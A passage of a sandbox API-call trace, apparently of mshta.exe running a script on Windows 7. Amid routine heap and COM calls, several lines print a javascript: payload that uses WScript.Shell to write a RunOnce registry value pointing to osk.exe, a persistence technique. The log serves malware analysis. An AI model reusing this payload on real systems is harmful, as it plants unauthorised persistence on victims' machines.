(HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3be0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c00 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c20 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c40 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c60 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c80 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3ca0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3cc0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3ce0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3d00 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3d20 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x7b9100 [0073.633] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.633] IsCharSpaceW (wch=0x6f) returned 0 [0073.633] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.633] IsCharSpaceW (wch=0x6f) returned 0 [0073.633] ??2@YAPAXI@Z () returned 0x2b53928 [0073.634] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.634] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0073.634] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x33f004 | out: lpclsid=0x33f004*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0073.636] SysStringLen (param_1=0x0) returned 0x0 [0073.636] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0073.636] CoGetClassObject (in: rclsid=0x33f004*(Data1=0x72c24dd5, 
Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eff8 | out: ppv=0x33eff8*=0x2b53998) returned 0x0 [0074.304] malloc (_Size=0x80) returned 0x11d990 [0074.304] GetVersionExA (in: lpVersionInformation=0x33dbe4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77c6e026, dwPlatformId=0x76f9f761, szCSDVersion="\x9cÜ3") | out: lpVersionInformation=0x33dbe4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.304] GetUserDefaultLCID () returned 0x409 [0074.305] DllGetClassObject (in: rclsid=0x792384*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x33ecb0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e368 | out: ppv=0x33e368*=0x2b53998) returned 0x0 [0074.305] ??2@YAPAXI@Z () returned 0x2b53998 [0074.305] WshShell:IUnknown:AddRef (This=0x2b53998) returned 0x2 [0074.305] WshShell:IUnknown:Release (This=0x2b53998) returned 0x1 [0074.305] WshShell:IUnknown:QueryInterface (in: This=0x2b53998, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef24 | out: ppvObject=0x33ef24*=0x2b53998) returned 0x0 [0074.305] WshShell:IUnknown:Release (This=0x2b53998) returned 0x1 [0074.305] ??2@YAPAXI@Z () returned 0x2b539b0 [0074.305] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33ee80, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0074.305] lstrlenA 
(lpString="\\wscript.exe") returned 12 [0074.306] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29 [0074.306] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1 [0074.306] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1 [0074.306] ??3@YAXPAX@Z () returned 0x1 [0074.306] GetCurrentThreadId () returned 0x544 [0074.306] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] IsCharSpaceW (wch=0x78) returned 0 [0074.307] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] IsCharSpaceW (wch=0x78) returned 0 [0074.307] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x33f004 | out: lpclsid=0x33f004*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0074.309] SysStringLen (param_1=0x0) returned 0x0 [0074.309] CoGetClassObject (in: rclsid=0x33f004*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eff8 | out: ppv=0x33eff8*=0x2b539e0) returned 0x0 [0074.315] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b539e0, riid=0x74a47884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x33eff4 | out: ppvObject=0x33eff4*=0x0) returned 0x80004002 [0074.315] FileSystemObject:IClassFactory:CreateInstance (in: This=0x2b539e0, pUnkOuter=0x0, riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33effc | out: ppvObject=0x33effc*=0x2b53a00) returned 0x0 [0074.316] FileSystemObject:IUnknown:Release (This=0x2b539e0) returned 0x0 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x33efb0 | out: ppvObject=0x33efb0*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef9c | out: ppvObject=0x33ef9c*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef98 | out: ppvObject=0x33ef98*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef94 | out: ppvObject=0x33ef94*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef90 | out: ppvObject=0x33ef90*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef8c | out: ppvObject=0x33ef8c*=0x2b53a00) returned 0x0 [0074.316] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 
0x1 [0074.316] GetCurrentThreadId () returned 0x544 [0074.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.317] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b46c0 [0074.317] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x7c6790 [0074.317] malloc (_Size=0x204) returned 0x2b53a20 [0074.318] ??2@YAPAXI@Z () returned 0x2b53c30 [0074.318] ??2@YAPAXI@Z () returned 0x2b53cb0 [0074.318] GetCurrentThreadId () returned 0x544 [0074.318] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.318] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b4708 [0074.319] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.319] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x7c3d40 [0074.319] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c6440 [0074.319] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b4750 [0074.319] SetTimer (hWnd=0x20280, nIDEvent=0x2000, uElapse=0xa, lpTimerFunc=0x0) returned 0x2000 [0074.319] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0074.320] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0074.582] GetCurrentThreadId () returned 0x544 [0074.582] GetCurrentThreadId () returned 0x544 [0074.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0074.583] ??3@YAXPAX@Z () returned 0x1 [0074.583] free (_Block=0x2b511b0) [0074.583] GetCurrentThreadId () returned 0x544 [0074.583] GetCurrentThreadId () returned 0x544 [0074.584] GetProcAddress (hModule=0x76e40000, lpProcName=0x93) returned 0x76e44c28 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7c3d60 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c6458 [0074.584] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="7955381", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x9) returned 0x7c6470 [0074.584] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="7955381", cchWideChar=-1, lpMultiByteStr=0x7c6470, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7955381", lpUsedDefaultChar=0x0) returned 8 [0074.584] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7c3d80 [0074.585] GetProcessHeap () returned 0x760000 [0074.585] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2ce8 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c6458 | out: hHeap=0x760000) returned 1 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c6470 | out: hHeap=0x760000) returned 1 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c4a98 | out: hHeap=0x760000) returned 1 [0074.585] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3d60 | out: hHeap=0x760000) returned 1 [0074.586] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7abf68, cb=0x800, pcbRead=0x33f48c | out: pv=0x7abf68, pcbRead=0x33f48c*=0x8) returned 0x0 [0074.586] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7abf70, cb=0x7f8, pcbRead=0x33f48c | out: pv=0x7abf70, pcbRead=0x33f48c*=0x0) returned 0x1 [0074.587] IBindStatusCallback:OnProgress (This=0x7a28c0, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, szStatusText="text/html") returned 0x0 [0074.587] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.WINSOCK_ACTIVITY") returned 0xc0f7 [0074.587] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.SET_CONNECTOID_NAME") returned 0xc0f6 [0074.588] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.IEXPLORER_EXITING") returned 0xc0fb 
[0074.588] FindWindowW (lpClassName="MS_AutodialMonitor", lpWindowName=0x0) returned 0x0 [0074.588] FindWindowW (lpClassName="MS_WebCheckMonitor", lpWindowName=0x0) returned 0x1014c [0074.588] PostMessageW (hWnd=0x1014c, Msg=0xc0f7, wParam=0x0, lParam=0x0) returned 1 [0074.588] IBindCtx:GetObjectParam (in: This=0x7a08d0, pszKey="__DWNBINDINFO", ppunk=0x33f3b4 | out: ppunk=0x33f3b4*=0x0) returned 0x80004005 [0074.588] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc166 [0074.588] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc122 [0074.588] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc190 [0074.588] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc176 [0074.588] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc178 [0074.588] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc177 [0074.588] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc17c [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc17d [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc17e [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc180 [0074.588] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc17f [0074.589] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc182 [0074.589] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc183 [0074.589] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc184 [0074.589] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc191 [0074.589] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc192 [0074.589] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc17a [0074.589] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc17b [0074.589] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc181 [0074.589] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 
0x7c3de0 [0074.589] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.589] StrCmpNICW (lpStr1="text/htm", lpStr2="text/css", nChar=8) returned 5 [0074.589] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7a9a30, cb=0x1ff8, pcbRead=0x33f5a8 | out: pv=0x7a9a30, pcbRead=0x33f5a8*=0x0) returned 0x1 [0074.589] IBindStatusCallback:OnProgress (This=0x7a28c0, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x4, szStatusText="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0074.589] GetCurrentThreadId () returned 0x544 [0074.589] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1fc) returned 0x7a5750 [0074.590] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.590] MulDiv (nNumber=8, nNumerator=4000, nDenominator=8) returned 4000 [0074.590] PostMessageW (hWnd=0x20280, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0074.590] IUnknown:QueryInterface (in: This=0x7a2f28, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f548 | out: ppvObject=0x33f548*=0x0) returned 0x80004002 [0074.590] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f534 | out: ppvObject=0x33f534*=0x0) returned 0x80004002 [0074.590] IBindStatusCallback:OnProgress (This=0x7a28c0, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x6, szStatusText="javascript:o=new ActiveXObject('WScript.Shell');x=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0074.590] GetCurrentThreadId () returned 0x544 [0074.590] IInternetProtocol:LockRequest (This=0x7abedc, dwOptions=0x0) returned 0x0 [0074.590] IBindStatusCallback:RemoteOnDataAvailable (This=0x7a28c0, grfBSCF=0x5, dwSize=0x8, pFormatetc=0x7aba44, pStgmed=0x78bc40) returned 0x0 [0074.590] IUnknown:QueryInterface (in: This=0x7a2f28, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e150 | out: ppvObject=0x33e150*=0x0) returned 0x80004002 [0074.590] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e108 | out: ppvObject=0x33e108*=0x0) returned 0x80004002 [0074.591] IUnknown:QueryInterface (in: This=0x7a2f28, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e148 | out: ppvObject=0x33e148*=0x0) returned 0x80004002 [0074.591] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e108 | out: ppvObject=0x33e108*=0x0) returned 0x80004002 [0074.591] GetCurrentThreadId () returned 0x544 [0074.591] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5958 [0074.591] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x7c9f80 [0074.591] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c6488 [0074.692] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, 
lpString1="text/html", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0074.692] GetCurrentThreadId () returned 0x544 [0074.693] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200c) returned 0x7ca0b0 [0074.693] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7ca0c4, cb=0x1ff8, pcbRead=0x33f464 | out: pv=0x7ca0c4, pcbRead=0x33f464*=0x0) returned 0x1 [0074.693] IInternetProtocol:Read (in: This=0x7abedc, pv=0x7ca0c4, cb=0x1ff8, pcbRead=0x33f464 | out: pv=0x7ca0c4, pcbRead=0x33f464*=0x0) returned 0x1 [0074.693] GetCurrentThreadId () returned 0x544 [0074.694] GetCurrentThreadId () returned 0x544 [0074.694] SetEvent (hEvent=0x164) returned 1 [0074.696] IBindStatusCallback:OnStopBinding (This=0x7a28c0, hresult=0x0, szError=0x0) returned 0x0 [0074.696] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.696] IBinding:RemoteGetBindResult (in: This=0x7a2f28, pclsidProtocol=0x33f580, pdwResult=0x33f570, pszResult=0x33f564, dwReserved=0x0 | out: pclsidProtocol=0x33f580*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x33f570*=0x0, pszResult=0x33f564*=0x0) returned 0x0 [0074.696] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f57c | out: pdwScheme=0x33f57c*=0xf) returned 0x0 [0074.696] GetCurrentThreadId () returned 0x544 [0074.696] GetCurrentThreadId () returned 0x544 [0074.696] SetEvent (hEvent=0x164) returned 1 [0074.697] CoTaskMemFree (pv=0x0) [0074.697] IInternetProtocolRoot:Terminate (This=0x7abedc, dwOptions=0x0) returned 0x0 [0074.697] IUnknown:Release (This=0x7a9718) returned 0x4 [0074.697] ReleaseBindInfo (pbindinfo=0x7abf00) [0074.697] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0074.697] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0074.697] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0074.697] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | 
out: lpMsg=0x33f7fc) returned 1 [0074.697] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0074.697] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0074.697] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x33df74 | out: ppURI=0x33df74*=0x78c78c) returned 0x0 [0074.698] IUnknown:QueryInterface (in: This=0x78c78c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33df4c | out: ppvObject=0x33df4c*=0x78c78c) returned 0x0 [0074.698] IUnknown:Release (This=0x78c78c) returned 0x4 [0074.698] IUnknown:AddRef (This=0x78c78c) returned 0x5 [0074.698] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1fc) returned 0x7a5b60 [0074.698] IUnknown:Release (This=0x78c78c) returned 0x4 [0074.698] IUnknown:Release (This=0x78c78c) returned 0x3 [0074.698] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x100) returned 0x7cd1e8 [0074.698] FindResourceW (hModule=0x73710000, lpName=0x1fe, lpType=0x6) returned 0x2f084d0 [0074.698] LoadResource (hModule=0x73710000, hResInfo=0x2f084d0) returned 0x2f2e53c [0074.698] LockResource (hResData=0x2f2e53c) returned 0x2f2e53c [0074.698] VirtualQuery (in: lpAddress=0x2f2e53c, lpBuffer=0x33f11c, dwLength=0x1c | out: lpBuffer=0x33f11c*(BaseAddress=0x2f2e000, AllocationBase=0x2c50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0074.698] SizeofResource (hModule=0x73710000, hResInfo=0x2f084d0) returned 0xe6 [0074.817] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5d68 [0074.817] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cd1e8 | out: hHeap=0x760000) returned 1 
[0074.817] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x300) returned 0x7cd1e8 [0074.817] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5d68 | out: hHeap=0x760000) returned 1 [0074.817] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5b60 | out: hHeap=0x760000) returned 1 [0074.817] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7cd1e8, Size=0x21a) returned 0x7cd1e8 [0074.817] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x21e) returned 0x7cd410 [0074.818] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f2d8 | out: ppu=0x33f2d8) returned 0x0 [0074.818] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.818] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.818] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0074.818] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x7a9258 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a37b0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c64a0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x7a9288 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3808 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x68) returned 0x7c68c0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x7afbe0 [0074.819] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3860 [0074.819] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c68c0 | out: hHeap=0x760000) returned 1 [0074.819] GetSystemDefaultLCID () returned 0x409 
